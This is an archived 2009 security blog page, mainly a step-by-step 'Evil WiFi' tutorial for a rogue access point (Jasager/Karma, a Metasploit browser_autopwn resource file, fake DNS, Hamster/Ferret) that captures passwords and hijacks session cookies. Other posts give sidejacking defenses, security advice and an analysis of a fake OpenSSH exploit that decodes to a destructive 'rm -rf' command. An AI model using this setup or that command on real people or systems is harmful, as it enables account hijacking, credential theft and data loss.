2009-07-29

Defense: Do as I say!

Most of us have all been there and gotten all holier-than-thou to clueless newbies, but when is the last time you took a good look at all the cool little tidbits of security knowledge (or any other advice really) that you've dispensed recently and used it as a yardstick against yourself?

Recently, a forum I am on was owned: completely and totally compromised. While I'm not terribly active there, I can say that I was guilty of re-using the password on that forum elsewhere. When the admins sent the massive e-mail to all the forum members that the passwords were compromised, I had two immediate thoughts, in the wrong order.

1) Why weren't they hashed? If they were compromised, that means that the attackers got plaintext passwords!

then,

2) Holy hell. They have my password to maybe a half a dozen other forums where I use the same username. Easy pickings!

Granted, the password isn't used for any of my e-mail accounts, blogs or social media things. Still, I was re-using a password that I keep around for relatively low-security accounts that I really don't care enough about to bother coming up with different passwords for. That's changed now. It was a wake-up call.

A friend of mine got bit by the same attack, but was also re-using that password on more sensitive accounts. And I'm talking about someone who is generally pretty bright.

Guilty
We're all guilty of it. I know we are. We tell people to do as we say, but we turn around and do something else.

"Turn off javascript!" we proclaim. "Don't re-use passwords. Cycle them every xx days!" and "Don't trust open wireless!" but the next day, there we are: Logging into our accounts that all use the same password and cracking our laptops open at the airport without tunneling traffic.

Security is hard work, and in the end it's all about trade-offs: usually sacrificing usability and/or speed in the process of protecting ourselves. Too much security and it hinders our ability to get anything done. Too little, and we have quick access, but so might someone else ;)

This doesn't just include password re-use, or passwords in general. It's all the things you think you know, the advice you give that you fail to take to heart yourself. Do a search for "password" in your inbox, or heck, try searching your email for your various passwords verbatim. Take a look at the corners you cut in the name of usability. You have just as much to learn from yourself as everyone else does, I'd bet.

At any rate, this is just a quick note to remind myself (and you guys) that we might want to take a dose of our own medicine once in a while. After all, if our advice is good enough for our peers and users, shouldn't it be good enough for ourselves?

Final preparations for DefCon

Asmodian X and I are finishing up the screenprinting for the HiR / CCCKC / DefCon 913/816 shirts we'll be wearing.



I'm also making sure things are patched and backed up, and packing my bags. I fly out tomorrow morning (Thursday) and land in Las Vegas a little after 9:00 AM.

Tom from Security Justice and I will be renting a limo from LAS to the Riv, Circus Circus, and Hilton area where many Defcon-goers have rooms reserved. If you get into town somewhere in the 9:00-10:30 range and you'd like to hitch a ride with us and split the fare, let me know. Same goes for if you just want to hang out.

Voice mail: +1-913-259-4HiR
Twitter: @ax0n
Email: ax0n [at] h-i-r [dot] net

2009-07-27

Defense Brainstorm: Fixing WiFi

A few things annoy me about how KARMA works. First off, if my wireless network at home is WPA2-PSK and one shows up with the same name somewhere else without any encryption, all the operating systems I know of will happily connect to the impostor.

Why operating systems don't try to match a given access point (or an AP mesh/WDS) to a key and warn you if there's no encryption when it has a key stored for the network boggles my mind.

For networks that aren't meshed, I think that the AP list should keep track of the BSSID (MAC address, essentially) of the access point, as well as any encryption keys.

I know very little about wireless drivers, supplicants, or even the lower level protocols more than tools such as Wireshark show me. I really have no idea how feasible this functionality is. In my opinion, if wireless connection tools alerted users to inconsistencies, things would be a little more secure. It most certainly wouldn't be hacker-proof. Even if these defenses were able to be switched on in some "advanced" control panel, I would probably sleep better at night after having set this up and educating my users.

As it stands, the only defense is to trust nothing by default, keep your software up-to-date, log out of all of your sessions and kill all your cookies before connecting to public WiFi somewhere -- or in some cases, even in your own home or office.

In the blink of an eye, tools like Hamster & Ferret can snarf valid sessions for your sensitive online web-apps, and as more things move "into the cloud" the more sensitive information could potentially find its way into the wrong hands.

Given the ubiquity and untrustworthiness of wireless networks, I feel like this is one of the weakest links right now. How would you fix WiFi? Are any of my ideas even possible?

Evil Wifi Part 3: Hamster & Ferret

Introduction
This is a multi-part series on getting Jasager to play nicely with Metasploit, Hamster & Ferret to create an evil wifi tar-pit of sorts. The end result will be a wireless network that can gather and replay session cookies for web applications and log passwords for a number of different protocols.

Building on Jasager and Metasploit to snare people in and trick their browsers into handing over session cookies, we take it a step further with Hamster & Ferret to actually hijack these active sessions.

Sidejacking
As I mentioned in my wireless/sidejacking defense article, sidejacking happens when you allow a session-id cookie to go across the wire in the clear. A third-party gets the session ID cookie and then proceeds to import the cookie into their browser, whereupon they have access to the account the session-id belongs to. This doesn't (usually) expose the password to the account, so access is usually temporary.

Sidejacking works best on a wired hub, open wireless networks, or in combination with some kind of man-in-the-middle attack. We're one better with Jasager and Metasploit. We are making a wide-open network where we are the default route and basically emulating every server in the planet for a variety of popular protocols.

Ferret
Ferret literally ferrets out interesting information from an interface. Kind of like tcpdump. For the intents of this article, Ferret's purpose is to watch the ethernet interface for session cookies while victims get directed to our fake web server which emulates various high-profile sites. As the fake web server gets these cookies, Ferret stores them for Hamster.

Hamster
Hamster is little more than a plain http proxy. By default, it runs on localhost:1234. If you point your browser's http proxy to that address and then navigate to http://127.0.0.1:1234/ you will see a dashboard with statistics about what Ferret has gathered. This includes IP addresses that have been sidejacked.

What you need
Jasager and Metasploit, set up HiR Style
A Crossover Ethernet Cable
It helps if you have a some way to get out to the Internet at the same time all this stuff is running. In my case, I'm tethering with my LG Chocolate.

Install
Download, exrract and compile hamster/ferret from Errata Security.
Note: On Ubuntu, I had to install the package "libpcap-dev" to get ferret to compile.

$ wget http://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z
$ tar xzf hamster-2.0.0.tar.z
$ cd ~/hamster/build/gcc4
$ make
$ cd ~/ferret/build/gcc4
$ make


Copy the Ferret Binary to the hamster/bin directory. I really wish Errata would streamline this crufty build process, but it works.
$ cp ~/ferret/bin/ferret ~/hamster/bin/


Pulling it all together
Just like in part 2:
  • Boot Jasager
  • Connect the ethernet cable
  • Set your laptop's ethernet interface for 192.168.1.2
  • Try to ping Jasager.
  • Start metasploit (as root) with the karma.rc file
Now it's magic time. Launch hamster as root in another terminal.
$ cd ~/hamster/bin/
$ sudo ./hamster

Set your browser's http proxy to 127.0.0.1:1234 then navigate to http://127.0.0.1:1234. Click "Adapters" and type the interface name that Jasager is connected to. Usually, this is eth0. You should eventually see the packet count increasing.

Alternatively, in another browser window or tab, pull up the Jasager control panel at http://192.168.1.1:1471/ just to see if there is any blood in the water.

Evil
Once someone connects and tries to get to a web page with a fully-functional browser, you see the database and target count increment. You may have some useable cookies and an IP address (or several) available to clone. Click one of the IP addresses in the right pane and the left pane will fill up with the sites that have been visited. Since Metasploit forces a lot of iframes to load, you will have to examine and poke around to figure out which (if any) of those sites have valid sessions stored. I recommend that you first clear all your cookies before cloning any IP addresses and clearing cookies between changing IP addresses to clone.

Also, if you forgot to update your proxy settings, Hamster will appear to work, but none of the cookies will be loaded. If you have a lot of trouble with Hamster cloning clients, make sure the proxy is pointed to 127.0.0.1:1234. You may clone this setting across all your proxy variables (such as SOCKS, etc)

Here, as shown in the right-most tab, I have successfully sidejacked my Facebook account -- which I was logged into on another computer in the lab, before I shut it down and tried connecting to wifi with all of these elements running.



Now, if this doesn't open your eyes to the vulnerabilities in your employees' laptops, your own procedures, and what exactly you're opening yourself up to when you hit the road with your laptop and crack it open in a Panera, I don't know what else I can say to help it sink in.

Props
Robert Graham at Errata, for hacking and coding this simple and hackish tool. Follow Robert, Marisa and David on the Errata Security Blog.

Evil WiFi Part 2: Metasploit Framework Setup

Introduction
This is a multi-part series on getting Jasager to play nicely with Metasploit, Hamster & Ferret to create an evil wifi tar-pit of sorts. The end result will be a wireless network that can gather and replay session cookies for web applications and log passwords for a number of different protocols.

Building on Jasager's ability to create a greedy wireless network, part 2 of this series shows how to use some of the "designed for karma" features of H.D. Moore's excellent Metasploit Framework to wreak wireless havoc.

What you'll need
A bunch of Karma (I'm assuming you use a Fonera with Jasager)
A crossover ethernet cable (some NICs auto-crossover)
A computer capable of running Metasploit Framework

What's the point?
If you have the right hardware, you can easily run some Linux tools that enable Karma and metasploit to run side by side on the same system. This is known as "Karmetasploit" and there are probably a thousand or more blog posts about it out there on the Internet. HD Moore's official karmetasploit page is a good place to look, though.

Initially, I started working on this because I was hitting roadblock after roadblock trying to get karmetasploit to work with the hardware I have. Another reason I like running Jasager as the Karma engine for Metasploit is because you can run Metasploit on whatever operating system you want. Metasploit framework uses ruby on rails, an OS-agnostic scripting language that works quite well on most platforms. This takes silly drivers, complicated shell scripts and pseudo-interfaces out of the equation for the user. They exist, but now they're all running on the Fonera courtesy of Jasager, and require no interaction thanks to the changes we made in Part 1.

One of the evil things Metasploit will do is force all web requests to load a page with a bunch of iframes apparently belonging to high-profile sites in order to get session IDs, miscellaneous cookies and auto-form-complete values for them, if stored in the victim's browser. In order to accomplish this, a fake DNS server is launched that replies to all requests with a response of the IP address we're using. It also launches a fake web server that issues the aforementioned page. This is why we configured Jasager to send DHCP options for DNS and default route to 192.168.1.2.

Install metasploit
I usually run Metasploit framework under Linux or BSD. I'll be using Ubuntu 9.04 Jaunty Jackalope as a lowest-common-denominator for this. Most platforms will require some prep-work installing the dependencies (i.e. Ruby and some of its libraries)

Installation instructions:
Debian and derivatives such as Ubuntu
Mac OS X
Windows (.exe Installer)

On Ubuntu, in addition to the packages listed in the installation instructions above, we need to install sqlite and its stuff for ruby

axon@virtubuntu:~$ sudo apt-get install \
sqlite3 libsqlite-dev libsqlite3-ruby


I use subversion to snag the latest development release of MSF, but you could just as easily download the Metasploit Framework 3.2 archive.

axon@virtubuntu:~$ sudo apt-get install subversion
axon@virtubuntu:~$ svn checkout \
http://metasploit.com/svn/framework3/trunk/ ~/msf

(output snipped - the MSF repo is something like 20,000 files!)
Checked out revision 6888.
Install Karma
Download the Karma resource file for metasploit: karma.rc

Stash karma.rc in the msf directory (where msfconsole is), or wherever the core metasploit framework files went when you unpacked them.

Time to tweak stuff
First tweak: Karma.rc has 'issues' - so we make a few changes:
  1. We're using 192.168.1.2 for our metasploit system
  2. The older "load db_sqlite" syntax is used (the new syntax is "db_driver sqlite3")
After modifications, the top of my karma.rc file looks like this:
db_driver sqlite3
db_create /tmp/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 192.168.1.2
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 192.168.1.2
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

Next, we really have to do something about the default metasploit page that loads when a victim falls into our trap. It doesn't exactly scream "you've been owned" but it certainly doesn't look like any friendly WiFi hotspot I've ever connected to, either.


Take my modified HTML file and replace the data/exploits/capture/http/index.html file with THIS ONE. Isn't this much more convincing?




Put on your robe and (black) wizard hat
  1. Make sure Jasager is powered up and plugged into your ethernet interface with a crossover cable.
  2. Make sure your ethernet interface has the proper address (192.168.1.2)
  3. Make sure you can ping Jasager
  4. Start msfconsole with the karma resource script!
Oh, yeah. About running metasploit as root: We will have to, since it will be using privileged listening ports (like 80, 25, 110 and the like)

axon@virtubuntu:~/msf$ sudo ifconfig eth0 inet 192.168.1.2
[sudo] password for axon:

axon@virtubuntu:~/msf$ ping -c4 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=38.0 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=1.67 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=1.56 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=1.53 ms

--- 192.168.1.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3008ms
rtt min/avg/max/mdev = 1.533/10.696/38.016/15.773 ms


axon@virtubuntu:~/msf$ sudo ./msfconsole -r karma.rc

_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ msf v3.3-dev
+ -- --=[ 392 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 168 aux

resource> db_driver sqlite3
[*] Using database driver sqlite3
resource> db_connect /tmp/karma.db
[*] Successfully connected to the database
[*] File: /tmp/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 192.168.1.2
AUTOPWN_HOST => 192.168.1.2
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 192.168.1.2
LHOST => 192.168.1.2
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
... BIG snip... A LOT of output

[*] Server started.

msf auxiliary(http)>


Test it out
Get a wireless computer connected to Jasager's advertized "guest" network (or try a random SSID and see if it works) then try to open a browser. You should get the "Welcome" or "Loading" page we set up earlier. At that point, your metasploit console should be scrolling with lots of lovely data!

msf auxiliary(http)>
[*] DNS 192.168.1.142:51335 XID 9878 (IN::A www.googol.com)
[*] HTTP REQUEST 192.168.1.142 > www.googol.com:80 GET / Mac FF 1.9.1.1 cookies=
[*] DNS 192.168.1.142:5353 XID 0 ()
[*] DNS 192.168.1.142:50718 XID 58634 (IN::A adwords.google.com)
[*] DNS 192.168.1.142:63751 XID 33590 (IN::A blogger.com)
[*] Request '/ads' from 192.168.1.142:49690
[*] HTTP REQUEST 192.168.1.142 > adwords.google.com:80 GET /forms.html
Mac FF 1.9.1.1 cookies=PREF=ID=0e98f2244567...

At any time, you can type the command "db_notes" in msfconsole to see what has been gathered. You can also keep an eye on your Jasager web console to see who is connecting. At this point, you are now well on your way to capturing data from people nearby.

I won't lie. The legitimate uses of this are mostly limited to vulnerability assessment and gathering information from wireless leechers. If you're not careful you could end up denying service to legitimate networks nearby, so use your brain.

In part 3, we will be using Ferret to log interesting information, and Hamster to load the session IDs and cookies into our browser via a proxy.

I have a LOT of stuff going on this weekend, and a short work-week followed by DefCon. I hope to have part 3 of the Evil Wifi series published on Monday, but we'll see how things go. No promises, as I haven't even thoroughly lab-tested Hamster & Ferret for anything but hijacking the simplest of sessions with this setup.

Shout-Outs
H.D. Moore has herded cats, mastered exploits and come up with far-and-away the most massive Ruby project in existence. It also happens that he doesn't let it go to his head. Online and off, he is more than happy to help people understand concepts. I'm buying this guy a beer or two if I ever cross paths with him.

Related:
Evil Wifi Series
BT3 / Karmetasploit / Alfa update
Defense: Sidejacking, Subversive Wireless

Evil WiFi Part 1: Jasager/Fonera Setup

Introduction
This is a multi-part series on getting Jasager to play nicely with Metasploit, Hamster & Ferret to create an evil wifi tar-pit of sorts. The end result will be a wireless network that can gather and replay session cookies for web applications and log passwords for a number of different protocols.

In part 1, I will discuss how to set up a La Fonera router with Jasager, and then do some post-installation configuration that will turn this little $30 WiFi router into a stand-alone, automated Karma installation to trap wireless clients without any interaction from you aside from hooking up a power source and network cable.

Things you will need:

  • A computer with an ethernet port, tftp server software (mac, windows, linux) and telnet/ssh clients (I stuck to Mac OS X for this but you can do it from Linux or Windows)
  • A Fon 2100 router from Fon.com
  • An ethernet cable for the La Fonera router
  • (maybe) a hub, switch or crossover ethernet cable
What's the point?
A rig like this can be used to quickly, cheaply deny wireless service (for example, if your office does not allow wireless by policy). It also allows you to gather information about people who are trying to connect to wireless networks when/where they should not be. Likewise, it can be used in vulnerability assessments. Like any security tool, there are black-hat uses for Jasager. Used alone, Jasager is mostly harmless. Note: we will be combining Jasager with some other powerful tools.

Hi. Meet Der Jasager, the "yes man"

If you're not familiar with Jasager, check out this video that Darren from hak5 put together. While kicking it with Darren in Springfield, MO last year, he was talking about the concept of a stand-alone Karma implementation on a router. It was an idea that he'd been kicking around with Mubix, and it didn't even have a name yet. Later on, he released this video and that sparked my interest even more. You can ignore the install instructions -- they are old and we can install Jasager in fewer steps now thanks to Digininja. It's still entertaining to watch.



Install Digininja's Jasager firmware
First things first, we have to flash the La Fonera router. I'm going to go on the assumption that you have a fresh FON 2100 from Fon.com and that you haven't plugged it in to the Internet (allowing it to upgrade itself... VERY BAD!) or can otherwise get your Fon router to a state where it can be flashed with the custom OpenWrt-based Jasager firmware. If you already have Redboot enabled, you can keep reading. Otherwise, get redboot enabled first! If you aren't sure if RedBoot is enabled, it almost assuredly is not. It is not enabled by default.

Once you get RedBoot enabled, download digininja's Jasager firmware. Unpack that archive into your TFTP Server's directory. Note that the filenames are slightly different for the Jasager firmware files, so if you're using our howto, keep this in mind. You might as well use Digininja's own installation walk-through though.

Once you get a fresh install on the Fonera, Jasager should be installed. Try hitting it at http://192.168.1.1:1471



Go ahead and create and bring the wireless interface online using the Jasager control panel if it asks (as shown above). You don't need to enable Karma mode just yet.

If the La Fonera doesn't come back up after 5 minutes, try telnetting to 192.168.1.254:9000 again and run fconfig in redboot. I had to fuss around with those options, but it might be due to the fact that I was re-flashing my fonera for the 50th time instead of using a fresh one from fon.com.

Tinker Time!

Now, it's time to screw with the innards of Jasager to make it play the way we want it to. First, we have to assign a password. This will (as the banner says) disable telnet and enable ssh. We also need to enable wireless.
Chimera$ telnet -lroot 192.168.1.1

Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

=== IMPORTANT ============================
Use 'passwd' to set your login password
this will disable telnet and enable SSH
------------------------------------------


BusyBox v1.11.2 (2009-03-28 00:20:52 GMT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
KAMIKAZE (8.09, unknown) ----------------------------
* 10 oz Vodka Shake well with ice and strain
* 10 oz Triple sec mixture into 10 shot glasses.
* 10 oz lime juice Salute!
---------------------------------------------------
root@OpenWrt:/#
root@OpenWrt:/# passwd
Changing password for root
New password: [typed my password]
Retype password: [typed my password again]
Password for root changed by root
root@OpenWrt:/# uci set wireless.wifi0.disabled=0
root@OpenWrt:/# uci commit wireless && wifi

This username (root) and your password will be required to hit the Jasager web UI from now on, so remember it.

Next, change the change the "option ssid" line in /etc/config/wireless file to something innocuous. "OpenWrt" is either boring (to geeks) or strange (to the mundane). Make it clever if not downright inviting! I chose "Guest" since that seems friendly enough.
option ssid    Guest

Since we'll be integrating Jasager with tools running on another system later, it's important to make sure that this system (preferably a laptop) is the default gateway and the DNS server for all clients who associate to the network. I decided to use 192.168.1.2 for the ethernet interface on my laptop.

The DHCP server configuration is in /etc/dnsmasq.conf, so add these dhcp options to the end of the file in order to set the default route and dns server to 192.168.1.2.
dhcp-option=3,192.168.1.2
dhcp-option=6,192.168.1.2


I also wanted Karma mode to be enabled by default. I dug through the Jasager cgi scripts and they just call iwpriv commands. I added these lines to /etc/init.d/jasager under the start() function:
wlanconfig ath0 create wlandev wifi0 wlanmode master
iwpriv ath0 karma 1 #enable karma mode

iwpriv ath0 addkarmassid "H-i-R.Net" #Don't trample on my own wifi!
You may wish to add a few addkarmassid lines for nearby legitimate wireless networks.

Give your Fon a quick reboot. It should come back up just fine. It should also associate with pretty much any random SSID you throw at it. Once it connects, try to connect to the Jasager Web interface again at http://192.168.1.1:1471/

It should load just fine and it should show that Karma is currently ON. You may wish to test Karma mode out a bit by trying to associate to some randomly-typed SSIDs. If that works, Karma is enabled and working properly. GAME ON.

Battery Power

For a truly mobile set-up, I recommend attaching a battery pack to the La Fonera router. From Radio Shack digi-key or mouser, you can buy the a style "M" male coaxial barrel pigtail, Battery clip(s), assorted wires, shrink tubing and connectors to hack it all together.

The Fonera is supposed to run on 5VDC with the center pin positive. I've found that I can safely use as many as six 1.2V NiMH cells in a battery clip to run my Fonera router without any problems. This is 7.2 Volts, well above the rated power supply voltage. I obviously can't guarantee that you won't damage your Fonera using any of the tricks (hardware or software) outlined here, but I can say mine has been working fine with an apparent 7.2 Volts.

Not to push product on you (okay, maybe just a little) but Duracell 2650mAh NiMH cells (shown left) are the most awesome rechargeables I've ever used. With them, this battery pack will surprise the hell out of you. It powers the Fonera for several hours. Of course, actual run-time varies with how much use it gets. I've noticed that leaving the Web UI up decreases run-time.

This fits nicely in the hackpack.


Congratulations, you're done messing with the Fon for now. You can simply power it on and chuckle while watching the Web UI as unsuspecting saps get roped into your clever trap, but the real fun hasn't even started yet...

Gr33tz, y0!!1!
Major props to the contributors to the Jasager project. Together, they took some loosely organized pieces and created a simple, inexpensive tool that is as fun and interesting as it is versatile.
  • Dino A. Dai Zovi and Shane "K2" Macaulay for the initial KARMA concept
  • Mubix for coming up with the idea of combining this all in a small package. Of all the hackers I know, he's probably the most passionate about brainstorming, tinkering and helping others learn.
  • Robin Wood a.k.a. DigiNinja for designing the UI and pulling all the pieces together to run on the Fon.
  • Darren at hak5, who introduced me (and I suspect many others) to Jasager. I can't tell if he's a salesman with tech skills or an uber-nerd with people skills. Either way, he's a very well balanced and charismatic show host and a great guy to know in person.
Related Content:
La Fonera Lab: un-bricking howto
CCCKC Grand Opening: Fon Presentation & Notes
Defense: Sidejacking, Subversive Wireless

2009-07-24

Social Stalking: Try Brightkite for DefCon



Brightkite is a service that focuses on short messages (much like Securitytwits' beloved Twitter) but it integrates photo hosting, threaded comments and location-awareness while allowing you to push updates, location check-ins and photos to Twitter, Facebook and Flickr (while automatically geo-tagging your photos).

The AJAX Web UI is clean and intuitive. The WAP and iPhone web interfaces are also easy to use and there are SMS/MMS and email interfaces that make it a snap to update from pretty much any device.

To top it off, several Brightkite applications are coming out for different smart-phone platforms. In fact, ReadWriteWeb gave a scathing review to Google's own location-aware Latitude, throwing in a bid for iPhone users to try Brightkite.

I personally use Brightkite to start my conversations since the threaded conversations there are intuitive AND my content can be sent to other popular platforms where my friends and family are. There are a lot more people on the other services (for now) but at the same time, I always have the brightkite feelers out for people who check in nearby.

For these reasons, I figure it's an easy and cool way to augment the social experience that goes with big conventions like Blackhat and Defcon. At the same time, you see photos from people and parties nearby and you get to keep tabs on where your brightkite friends are, assuming they want you to know.


Privacy is kind of a big deal -- especially among us paranoid security-types. Brightkite offers privacy controls for people you trust, people you befriend, and the public space. It also allows you to be as granular or as general as you wish with your location information. I could check in at "Kansas" or "Japan", or I could check in at "2901 Las Vegas Blvd, 89109" - I usually check in NEAR (but not specifically at) sensitive locations such as my home or office, then check in at a specific address if I'm somewhere that people might want to catch up with me (DefCon, for example). I even got them to set up a placemark specifically for DefCon (when you type "DefCon" in the place search, you see the Riviera)

If nothing else, keep an eye on the Brightkite Wall during DefCon. You don't even need to sign up to make that one work! I know a few other BrightKiters who will be there so the DefCon "wall" should be pretty interesting.

2009-07-23

A blonde joke courtesy of Google.

Nothing against blondes, but this one reminds me of "write 'flip over' on both sides of a piece of paper"

Recursion. lolwut?



hat tip: Dangerboy

2009-07-21

Defense: Sidejacking, subversive wireless

Karmetasploit is a fun little toy, and I think I've got it working well -- and then some. The details of that project will be revealed later this week, hopefully. Let's just say that with a La Fonera router and a laptop, I found a way to leverage metasploit (and a few other fun tools) into a very powerful subversive wireless setup.

It's pretty much a running gag. If you see Surbo from i-Hacked in the room (and sometimes even if you don't), you shouldn't bother powering on any of your wireless toys. He almost certainly has an eeePC hiding somewhere ready to rope you into his rogue wireless network and has metasploit armed and ready to steal your session IDs.

Sidejacking happens when you allow a session-id cookie to go across the wire in the clear. A third-party gets the session ID cookie (using metasploit, hamster & ferret, Wifizoo or other tools like them) and then proceeds to import the cookie into their browser, whereupon they have access to the account the session-id belongs to.

Usually, these exploits happen due to sniffing (open Wifi, wired ethernet to a hub, ARP poisoning, Arp table flooding) but the other way they occur is through subversive wireless, I.e. Karma.

In a nutshell, Karma listens for probe requests from wireless clients and immediately begins broadcasting that SSID. It effectively ropes all new wireless clients in who aren't already associated to an existing network. When you combine Karma and Metasploit together, you end up with a rogue Access point that has the following traits:

  • Will associate to any SSID
  • Assigns a default route to the address Metasploit is listening on.
  • Runs a fake DNS server that points all domain names to the Metasploit IP
  • Launches several fake servers to gather passwords, cookies and other authentication information
  • In the case of Karmetasploit, it launches a page with many iframes so it gathers cookies for an entire list of popular sites.
So, when Thunderbird or Outlook try to connect to mail.yourcompany.com, they end up going to Metasploit. And when they hand off your username and password, Metasploit logs it in the database. Same thing goes for your cookies.

While showing a team-mate of mine how easy and devastating these tools are, we started coming up with ways to defend ourselves. Most are pretty obvious.

  • Set your browser to clear the cache, any saved passwords and all cookies every time you close it.
  • Always close all of your browser windows (and thus, get rid of all cookies and passwords) before closing the lid to your laptop or going out and about with your mobile device.
  • If possible, make sure your wireless adapter is not configured to automatically join wireless networks.
  • If you normally connect to an encrypted wireless network, but see one with the same name that's not encrypted, it may (or may not) be a rogue access point.
  • While out-and-about, it may be wise to tunnel sensitive traffic, or just wait until you get to a trusted network in order to conduct your business affairs.
  • Use sites that utilize SSL for everything, and be very, very cautious of tools such as SSLStrip.
Keep in mind a few other things:
  • Anyone can set up an open wireless hotspot and sniff the traffic from it.
  • The ubiquity of WiFi makes rogue hotspots easy to hide. It's not hard to make it look like it belongs to the hotel or coffee shop next door.
  • Some of the most dangerous access points show no sign of being rigged. You can get online, do your stuff, and leave without knowing someone was watching.
I'll post a bit more about my latest adventures from the attack side of things later this week.

2009-07-20

Gentlemen, start your badge-hacking engines!

Last week, I asked Joe Grand if he'd be willing to give HiR Readers a sneak peek of the DefCon 17 Badges, kind of like Wired covered last year. Concerns of counterfeiting and unfair advantages for would-be badge hackers were cited as reasons why he couldn't disclose any info to me (orders actually coming from Dark Tangent himself).

He promised that as soon as he got clearance to do so, he'd be posting info to the DefCon forums. This way, badge hackers could at least get their IDEs installed and bring the supplies needed to interface with the microcontroller.

That day has come.

Attendees from both HiR and i-Hacked had a blast hacking the DefCon 16 badges together last year. Go read up and get prepared.

Abbreviated from Kingpin's post... highlights for the new badge:

  • The processor this year is a Freescale MC56F8006 Digital Signal Controller.
  • The development environment is Freescale CodeWarrior for DSCs. It's a similar IDE to previous badges (sorry, still Windows only AFAIK, but works fine in a VM) (Free Download)
  • There will a serial bootloader on-board to enable you to easily load your own firmware onto the badge (simply requiring a terminal program, like HyperTerminal, and the hex file). You need something like this to interface the board.
Still no photos yet. I'm looking forward to seeing what the new badge does and what it can be made to do!

2009-07-17

If you see Open0wn.c or 0wn0wn.c laying around, don't run it, mkay?

I continue to see this code masquerading as the Zero-Day OpenSSH Exploit. It showed up on Pastebin today so I reported it as abusive. If you haven't figured it out yet, this "exploit code" only exploits the person that runs it -- i.e. script kiddies and/or careless researchers.

Thierry Zoller already did a good a great job "disassembling" this and proving that it is being spread just to lay pwnage upon those who are trying to find and/or test the exploit.  It basically deletes everything you have in your homedir (and all of the root dir, if you're dumb enough to run it as root) as shown below. I modified the jmpcode[] to something an online hex-to-ascii converter can comprehend, and the result was "rm -rf ~ /* 2> /dev/null &" 


As a general rule, you should always be careful when tinkering with someone else's un-trusted code, never run stuff like this as root without checking the source code and (yes, I'll say it again) back up your data. It will save your ass.

Check out Thierry's post on secdev for a decode of the rest. It's a good read.

Friday Musings: Defcon

Just to keep my finger on the pulse of all things DefCon, I imported a Twitter Search feed for "defcon" into my Google Reader list. I figure it will be a good way to see who's planning on going, what talks are generating all the buzz, and maybe find out about some unofficial defcon events.


While that's been quite successful, I also encountered something unexpected: people who still use "defcon" as a tongue-in-cheek panic word. Side-note: many of them don't realize that the higher numbers mean LESS panic. But whatever. At least this guy almost got it right.

The truth is that DEFCON 1 has likely never been used. It doesn't specifically mean nuclear war, but any time that the US is on the defensive end of a serious and imminent attack by foreign military. The 9/11 incident took us to DEFCON 3. [Wikipedia]

At any rate, I've got almost everything ready for DefCon (the conference, not our Defense Condition). I don't quite have all my talks picked out, but I did find it odd that a speaker shares my last name -- which is an unusual last name to begin with. I may have to sit in on that talk.

2009-07-15

Contest: What's In Your Hackpack?

From what I can tell, a good chunk of our readers are road warriors. Road warriors come in all shapes and sizes, though. I personally know one guy with an nmap-armed Palm Pre (and similarly weaponized iPhone carriers) and a few battle-ready Techno-Thugs ready to bludgeon your skull with a pair of Panasonic Toughbooks.

Goal: Go mobile. Cause mayhem. Get out. What would you rock in your hackpack? Here's an example of what I'd load myself down with this (You can click here to see my Flickr Notes where I've labeled everything)



And it all fits nicely in here:


Now, for the contest! Up For Grabs: Two Pairs of AMC Silver Experience movie passes. Each winner will receive vouchers for two movie tickets at an AMC Theater. Sorry folks, that's all I have laying around, unless someone wants to donate some wicked schwag. So, there are two ways to win.

The first way is to e-mail hackweight (at) h-i-r.net with your guess as to how much my hackpack weighs when it's packed with the contents above. You can guess once per day. The first person to get it within .1 pound will win. If the contest goes too long, we'll just let the person who got the closest take the prize.

The other way you can win is by submitting pictures of your hackpack (both spread out and packed up) to hackpack (at) h-i-r.net. You can attach the photos (800x800 max, please) or host them somewhere and link us to them. Sometime before DefCon the HiR Crew will feature our faves and put it to a public poll. Whoever gets the most votes wins!

Paypal effectively shuts down Hackers For Charity & Johnny Long's Family

From HFC:

PayPal has frozen my assets. We have no source of income beyond the car money we just spent in Kampala on Monday. I may very well have to return to Kampala and get the car payment money back to live off of. We are stranded financially and physically without a vehicle because of PayPal.

...

The bottom line is PayPal has frozen my assets (which aren’t theirs.. how can they do this?) including all the support money my family is relying on.

I’ve spent hours on the phone (on hold) to PayPal at approximately 30 cents a minute to try to get this resolved only to be told to use email. I’m considering legal action over this.

HFC is at a complete standstill. We can not order shirts for the conference. Subscriptions are bouncing. Informer is down. Subscribers are (rightly) pissed because they don’t have what they’ve paid for. I can’t order the items for the DEFCON auction. There are too many problems to list here. The biggest is that PayPal has locked down my family’s survival money.

I have no clue what to do at this point.
I can't speak for all of HiR, but I strongly believe in what Johnny Long is doing. He's the author of No Tech Hacking and all proceeds from the sales of that book (and many others of his) went straight into his charity.

There's been an obvious outcry for support on Twitter, but Johnny hasn't specified how we can help -- As he said himself, he has no clue what to do at this point. Several friends of mine are raising hell with execs at PayPal and eBay. Just keep Johnny, his family and Hackers For Charity in your thoughts through all this.

2009-07-09

OpenSSH - The coast is clear. For now.

